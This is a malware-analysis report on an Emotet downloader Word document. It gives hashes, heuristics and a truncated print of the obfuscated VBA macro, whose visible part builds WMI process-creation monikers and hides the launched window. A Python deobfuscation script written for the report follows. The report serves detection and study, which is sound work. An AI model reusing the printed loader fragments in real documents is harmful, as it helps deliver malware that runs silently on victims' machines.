Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 3d4e35724379eb6f…

MALICIOUS

Office (OLE)

Size: 193.5 KB
Created: 2019-02-22 10:51:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 74e3a177cf777c75a70d799b2229a479
SHA-1: 5ee82aa438a9f723168e7157d5832fd0371f25c1
SHA-256: 3d4e35724379eb6f65e1e12baa4262ea0ca687188aeb0c1ae47d4cae01859cc3
Risk score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

ClamAV identifies the file with the signature 'Doc.Downloader.Emotet-6865935-0', i.e. a downloader document. Heuristics confirm a VBA project with an AutoOpen entry point and a GetObject call, the standard combination for running code as soon as the victim enables macros. The extracted source shows the loader scaffolding typical of 2019 Emotet maldocs: every meaningful string is padded with never-assigned junk variables (for example w5_34067 + "winmgmts:Win32" + Q_51_0_3 + "_ProcessStartup" + S72405, which evaluates to "winmgmts:Win32_ProcessStartup" because unassigned Variants concatenate as empty strings), the resulting WMI moniker is passed to GetObject, and ShowWindow on the Win32_ProcessStartup object is set through an expression (G23_1_ + 952579 - 952579 + U9___08) that folds to 0, so the child process starts with a hidden window. A "winmgmts:Win32_Process" moniker is built the same way, which points at WMI process creation (ATT&CK T1047). The command line that is eventually launched and the download URL lie beyond the truncated preview, so the second-stage payload and its delivery host are not recoverable from this page; the downloader verdict rests on the signature plus the visible process-creation setup, which is consistent with Emotet's behavior.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6865935-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6865935-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen procedure, which Word runs as soon as the document is opened with macros enabled; no further user interaction is needed.
  • GetObject call [high] (OLE_VBA_GETOBJ)
    The macro calls GetObject, which resolves a moniker string to a live COM object. In this sample the argument folds to "winmgmts:Win32_ProcessStartup", i.e. a WMI object used to configure how a new process is launched (a "winmgmts:Win32_Process" moniker is also built, but its use lies past the truncated preview).
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents whose source extraction fails, where no readable source is available; here it corroborates the source-level findings.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The heuristic's generic rationale is that no modern VBA project was recovered and no stronger macro-virus family marker was present; in this sample a VBA project was recovered (see the extracted macros.bas below), so treat this marker as duplicate evidence of the AutoOpen surface, not as an independent finding. It is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the OOXML DrawingML schema namespace, a static string present in any Word file that carries drawing parts; it is not a download or command-and-control location and should not be submitted as an indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 45503 bytes
SHA-256: ff8adc948e68e80b589c2703e12aa179312e52fb6909e4a4504d68e329f88d47

Preview (first 1,000 lines of the extracted script; the listing below is itself cut short):
Attribute VB_Name = "k8_0801"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Q3_395"
Function m_7_3313()
   Select Case O610694_
         Case 856301476
P7945_ = (l__538 * Fix(686814843 / CBool(Z7960_9))) - h_9__2 / Oct(472587792) / 664872836 + CStr(S_4516) - 291702533 + ChrB(C_3_9_)
End Select
   Select Case l3__989
         Case 524506268
o3585_4_ = (Q4___916 * Fix(68779480 / CBool(H7349_91))) - m__33__ / Oct(756626926) / 238428477 + CStr(F6175__) - 961230301 + ChrB(X__9_3)
End Select
   Select Case w_3_524
         Case 134737171
j9_385 = (c299___ * Fix(652907553 / CBool(z_9200))) - c632_2_4 / Oct(681703735) / 928044950 + CStr(L5_7_40) - 325859610 + ChrB(p08339)
End Select
   Select Case W25_8__
         Case 787669236
h_1_1_6 = (I95_452_ * Fix(687291470 / CBool(S00_901))) - L2__8_ / Oct(679906984) / 59912940 + CStr(j17_1_24) - 80595103 + ChrB(I48_4_2)
End Select
   Select Case R______
         Case 697673231
D8_327_9 = (A_5857 * Fix(439689511 / CBool(N987_2__))) - Q_744__ / Oct(177295288) / 2996236 + CStr(P342950) - 322308665 + ChrB(c6_0381)
End Select
   Select Case z_168300
         Case 969917109
P88_47 = (D_64_5_ * Fix(540033466 / CBool(u_2786))) - A9_4_1 / Oct(28933302) / 856200009 + CStr(q25_5_4) - 946225785 + ChrB(G200672)
End Select
   Select Case h655283_
         Case 27785945
E3101__ = (I__82_ * Fix(46496789 / CBool(c__018))) - B2_1564 / Oct(922241155) / 216649713 + CStr(k_7_040_) - 636608685 + ChrB(I7987_)
End Select
End Function
Function w_5024(p84753, h62078)
On Error Resume Next
   Select Case i28839_9
         Case 295330195
w35_695 = (E4897__4 * Fix(933987790 / CBool(i1074_44))) - I_07415_ / Oct(175316490) / 802534161 + CStr(k978_17_) - 601088305 + ChrB(W__8__86)
End Select
   Select Case T048_6
         Case 123926770
R12194_ = (k_8___28 * Fix(576836159 / CBool(U146350_))) - a98__0_1 / Oct(962277199) / 900648578 + CStr(Q_9_9_) - 407868609 + ChrB(q0214__)
End Select
   Select Case l_9665_4
         Case 268175503
w112981_ = (C52891 * Fix(550412451 / CBool(v_6749))) - R20028 / Oct(651251203) / 271928447 + CStr(F477_380) - 660387921 + ChrB(o4684_39)
End Select
v1991998 = w5_34067 + "winmgmts:Win32" + Q_51_0_3 + "_ProcessStartup" + S72405
   Select Case b__456
         Case 196297070
w6_980__ = (C211__45 * Fix(344720736 / CBool(i_4277))) - R_63_1 / Oct(587232471) / 519637392 + CStr(b_10_0) - 989324233 + ChrB(F612_606)
End Select
   Select Case V2954_
         Case 306390112
w6462_ = (z6_919_4 * Fix(503136049 / CBool(Y7_31_6))) - C_09__67 / Oct(667162280) / 714373574 + CStr(d98217) - 366274017 + ChrB(C0_0_034)
End Select
F29__4 = i_0_04_2 + "winmgmts:Win32" + i_16__ + "_Process" + z510_1
   Select Case s85917
         Case 317721249
X066090 = (n_9_72 * Fix(241305419 / CBool(u29095))) - a5_0__ / Oct(351756757) / 251683363 + CStr(R938_9) - 772861227 + ChrB(i_1467)
End Select
   Select Case w9297_
         Case 507224544
M7_10016 = (u6_58279 * Fix(53614763 / CBool(A213_29))) - z645_3_ / Oct(411523928) / 351362613 + CStr(C_97_15) - 563892474 + ChrB(H765450_)
End Select
   Select Case J__915
         Case 808605171
q73654_ = (r5819_76 * Fix(91823898 / CBool(d94_2__))) - A9_10_ / Oct(328444458) / 289784531 + CStr(G5460_) - 504383416 + ChrB(v30373)
End Select
Set U9814_2_ = GetObject(A_12_92 + v1991998 + U__5062)
   Select Case t_8419__
         Case 982956485
w6_47_6 = (s2124_ * Fix(12320654 / CBool(w_63341))) - r39_5298 / Oct(35998885) / 572272312 + CStr(Q4151__) - 397465983 + ChrB(d25134)
End Select
   Select Case z1342_4_
         Case 689330272
N1_695 = (G_471193 * Fix(497901881 / CBool(q55____4))) - z147_948 / Oct(724819746) / 979894920 + CStr(n___92) - 167176566 + ChrB(m__0__41)
End Select
U9814_2_.ShowWindow = G23_1_ + 952579 - 952579 + U9___08
   Select Case r__7_06
         Case 529770445
F7_137 = (H299
... (truncated)
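The two source-level heuristics above (OLE_VBA_AUTOOPEN and OLE_VBA_GETOBJ) and the junk-variable padding visible in the preview can be reproduced in a few dozen lines. The following is an added example written for this page; it is not code from the sample, from oletools or from the scanner that produced the report. Its input is a constructed excerpt modelled on the preview (the AutoOpen stub at the end is assumed, because the preview is cut off before the auto-exec procedure the heuristics report), and its folding rule, that a name which is never assigned is an Empty Variant and concatenates as "", is an assumption about this obfuscation style that holds for the visible lines but would not survive a variant that assigns the padding variables elsewhere.

```python
import re

# Constructed sample input, modelled on the macro preview above. It is not the
# full carved artifact: the AutoOpen stub at the end is an assumption, because
# the preview is cut off before the auto-exec procedure the heuristics report.
SAMPLE_VBA = '''\
Attribute VB_Name = "Q3_395"
Function w_5024(p84753, h62078)
On Error Resume Next
   Select Case i28839_9
         Case 295330195
w35_695 = (E4897__4 * Fix(933987790 / CBool(i1074_44))) - I_07415_ / Oct(175316490)
End Select
v1991998 = w5_34067 + "winmgmts:Win32" + Q_51_0_3 + "_ProcessStartup" + S72405
F29__4 = i_0_04_2 + "winmgmts:Win32" + i_16__ + "_Process" + z510_1
Set U9814_2_ = GetObject(A_12_92 + v1991998 + U__5062)
U9814_2_.ShowWindow = G23_1_ + 952579 - 952579 + U9___08
End Function
Sub AutoOpen()
w_5024 1, 2
End Sub
'''

# Procedure names Word/Excel run without user interaction.
AUTO_EXEC = {"autoopen", "auto_open", "autoexec", "autoclose", "auto_close",
             "document_open", "document_close", "workbook_open", "workbook_close"}

PROC_RE = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)',
                     re.I | re.M)
# Plain "name = expr" assignments. "Set obj = ..." does not match because the
# identifier in front of "=" would have to be the keyword "Set".
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$', re.M)
GETOBJ_RE = re.compile(r'GetObject\(([^)]*)\)', re.I)
# One token of a concatenation chain: string literal, identifier/number, or "+".
PART_RE = re.compile(r'\s*(?:"((?:[^"]|"")*)"|(\w+)|(\+))\s*')


def auto_exec_procs(src):
    """Names of auto-executing procedures declared in the module."""
    return sorted(n for n in PROC_RE.findall(src) if n.lower() in AUTO_EXEC)


def string_assignments(src):
    """name -> right-hand side of every plain assignment (last one wins)."""
    return {name: rhs for name, rhs in ASSIGN_RE.findall(src)}


def fold_concat(expr, assigns, depth=0):
    """Fold a '+' chain of literals and variables into one string.

    Assumption (matches the sample): a variable that is never assigned is an
    Empty Variant, and Empty concatenates as "". Assigned variables are folded
    recursively. Arithmetic, calls and numeric literals are not string builds
    and yield None.
    """
    if depth > 8:                       # guard against a = a + "x" cycles
        return None
    out, pos, need_operand = [], 0, True
    expr = expr.strip()
    while pos < len(expr):
        m = PART_RE.match(expr, pos)
        if not m:
            return None                 # "(", "*", "/", ...: not a concatenation
        pos = m.end()
        lit, ident, plus = m.groups()
        if plus is not None:
            if need_operand:
                return None
            need_operand = True
            continue
        if not need_operand:
            return None                 # two operands without a "+" between them
        need_operand = False
        if lit is not None:
            out.append(lit.replace('""', '"'))
        elif ident.isdigit():
            return None                 # numeric literal: arithmetic, not a string
        elif ident in assigns:
            sub = fold_concat(assigns[ident], assigns, depth + 1)
            if sub is None:
                return None
            out.append(sub)
        else:
            out.append("")              # never assigned -> Empty -> ""
    return None if need_operand else "".join(out)


def resolved_strings(src):
    """Every assignment that folds to a plain string once the padding is removed."""
    assigns = string_assignments(src)
    folded = {n: fold_concat(r, assigns) for n, r in assigns.items()}
    return {n: s for n, s in folded.items() if s is not None}


def getobject_targets(src):
    """Moniker strings handed to GetObject, with the junk padding folded away."""
    assigns = string_assignments(src)
    targets = (fold_concat(arg, assigns) for arg in GETOBJ_RE.findall(src))
    return [t for t in targets if t is not None]


def scan(src):
    """The findings the page's OLE_VBA_AUTOOPEN / OLE_VBA_GETOBJ heuristics encode."""
    targets = getobject_targets(src)
    return {
        "auto_exec": auto_exec_procs(src),
        "getobject_targets": targets,
        "uses_wmi": any(t.lower().startswith("winmgmts:") for t in targets),
    }


if __name__ == "__main__":
    for key, value in scan(SAMPLE_VBA).items():
        print(f"{key}: {value}")
    print("folded strings:", resolved_strings(SAMPLE_VBA))
```

Run against the real macros.bas, the folding step is what turns lines like the v1991998 assignment into readable monikers without executing anything; it deliberately refuses any expression that is not a pure concatenation, so the arithmetic junk inside the Select Case blocks is skipped rather than mis-evaluated. A fold that returns None for a GetObject argument is a signal that the sample assigns its padding variables somewhere else and a different deobfuscation rule is needed.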